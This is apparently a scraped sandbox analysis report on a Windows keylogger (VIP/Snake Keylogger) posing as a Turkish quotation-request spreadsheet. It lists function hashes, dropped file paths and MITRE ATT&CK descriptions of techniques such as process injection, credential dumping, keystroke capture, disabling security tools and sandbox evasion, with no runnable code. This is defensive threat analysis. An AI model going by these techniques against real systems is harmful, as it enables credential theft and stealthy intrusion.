Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7f3400d5d329d8891df86fdd280e72d30611b3e3d9e536b92fe4f0ed582a20
Instruction ID: f0bc08b1218402daab23f36fcec7d7552f59959c6ef608a0997bd9375afbeb32
Opcode Fuzzy Hash: fe7f3400d5d329d8891df86fdd280e72d30611b3e3d9e536b92fe4f0ed582a20
Instruction Fuzzy Hash: 0E0128327042196BDB51DE649C20BAF3FDBEBCC351F04802AFA05DB280CE718C119B90

Function 057EABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aaa6d9e479f259b64f31041c724f1ad6beb8f8f43ee9e603e516232d73048b
Instruction ID: f00a7bc713e8a221f500fbf83eb7c6f7a67c605a79c0146d13fc7a0dad218408
Opcode Fuzzy Hash: f4aaa6d9e479f259b64f31041c724f1ad6beb8f8f43ee9e603e516232d73048b
Instruction Fuzzy Hash: 34F0F6317007104B87155A2ED85CA2EB7DEFFCCA5130950B9E90AC7371EE20CC038390

Function 057EE8E8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f78ed421e33bda302b73f221cfe3a5f31e6007b838474c061abb1262acfd49
Instruction ID: 5f1c9648df6b793900538ca35cd3a6e12d93deffa1c8b13576bd41348f2f9560
Opcode Fuzzy Hash: e8f78ed421e33bda302b73f221cfe3a5f31e6007b838474c061abb1262acfd49
Instruction Fuzzy Hash: 06015E74D0024ADFEF40DFA8E854AAEBBB1FB49310F008565DD20A3390E7385A65DF91

Function 057EF3F1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249d14068aa83ba1378e1fd1626e8df2a26b66b2480b8d7f41589e5075170cb7
Instruction ID: 73585838bf44addd22f774662a49f631754aabe77e8115f26351099c6d2eeae6
Opcode Fuzzy Hash: 249d14068aa83ba1378e1fd1626e8df2a26b66b2480b8d7f41589e5075170cb7
Instruction Fuzzy Hash: 83F0C870D0130A8FE704DF69D4406AFBFF1FB96301F00D295C8148B254D7349905CB82

Function 057E28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21ffaaea45f1745413dce8c4025e72e6cd2d482cd303506e1453d9768dd63c7
Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
Opcode Fuzzy Hash: b21ffaaea45f1745413dce8c4025e72e6cd2d482cd303506e1453d9768dd63c7
Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1

Function 057E28A3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1650e730769cf1d0fad018da1c053fdc593492ab1bf49d607039a9fb8de0c410
Instruction ID: 4f90921f221f3503cd6d629b48ac9f390a4207065f2ed0e6a9bd0c9f91c8d658
Opcode Fuzzy Hash: 1650e730769cf1d0fad018da1c053fdc593492ab1bf49d607039a9fb8de0c410
Instruction Fuzzy Hash: C3E0C276D2026786CB01DBA0ED056EEFB35EF86216F544666D41173540EB305269C2A0

Function 057E8EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 5f797bb080344220c95a1cf02a420fc40c56042e37f0f1e0377f71a910e0246c
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: F6C08CB320C2282AA234504E7C40EB3BB8ED3C93B4E210137FA1CD3202AC429C8011FA

Function 057ED6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d24c0e8485f4d551cb37c27526ac0a23dfdf7436d736f6f590bab29112777f
Instruction ID: 3bc17dfe0ff2c01eb7431d0403340b4cf1481b6e7a4fcde5de6839cd5c018a08
Opcode Fuzzy Hash: 92d24c0e8485f4d551cb37c27526ac0a23dfdf7436d736f6f590bab29112777f
Instruction Fuzzy Hash: B2D04235E14209CBDB74EFA8E4994DCFF71EB89722B10602AE929A3251DA3464558F11

Function 057EAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc5773f45b91d9cc9c5d235071faf77cc79466a4f37a6e6668c72790bbcede7
Instruction ID: b81420456a4cf2f50ebd1a4ca99f5cc8f941c18915e5b8b3bdd2a1b6107b8c63
Opcode Fuzzy Hash: 4dc5773f45b91d9cc9c5d235071faf77cc79466a4f37a6e6668c72790bbcede7
Instruction Fuzzy Hash: 44D0673AB101089FCB049F99E8409DDF776FB98221B049126FD15A3260C631A925DB60

Function 057E6739 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be65ce4f4cb6820060da09057eb15fa5103efe6591e09219168e3b71aae8eeea
Instruction ID: c623a071ee6f461c82a6aaa7e0e330524a1c78abd39b2f363d089931a04e008f
Opcode Fuzzy Hash: be65ce4f4cb6820060da09057eb15fa5103efe6591e09219168e3b71aae8eeea
Instruction Fuzzy Hash: 06D05E305187668FE381E770EC17B693E5AB7D0606F04E214E4840998ADFBC180A8F42

Function 057E6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e6eb114333bd026f47621e9808620630fde7c80116364ea3cdf7f0d3650b5da
Instruction ID: 784c4ca45a9b872994aec04c245a586d77ee9828a553c2082ed70c5c6773ab62
Opcode Fuzzy Hash: 1e6eb114333bd026f47621e9808620630fde7c80116364ea3cdf7f0d3650b5da
Instruction Fuzzy Hash: 48C012305403298FD545E765EC46929372EF6D0A01B44A610A5050954EDF786C554B91

Function 057E98F0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afae142718980ae72a3b9591f5406b51cc6966bc64f1e72a051d1f9c7bc32c26
Instruction ID: 68a122a26a669943b2e442b3af8d51fca844216374b8527a74dbc8b8f460ee35
Opcode Fuzzy Hash: afae142718980ae72a3b9591f5406b51cc6966bc64f1e72a051d1f9c7bc32c26
Instruction Fuzzy Hash: 0BC0021155EBC21ECA9283752E692887F501B87131B19A3D6D4E4499F28608601BD605

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qovDEn.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gbwejyd.2q3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwxsesfe.vsy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4o5ji5g.0wd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3v321xo.qac.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuxsommc.0ve.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te0ocm1v.dqo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0gbpkkv.ys4.psm1

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre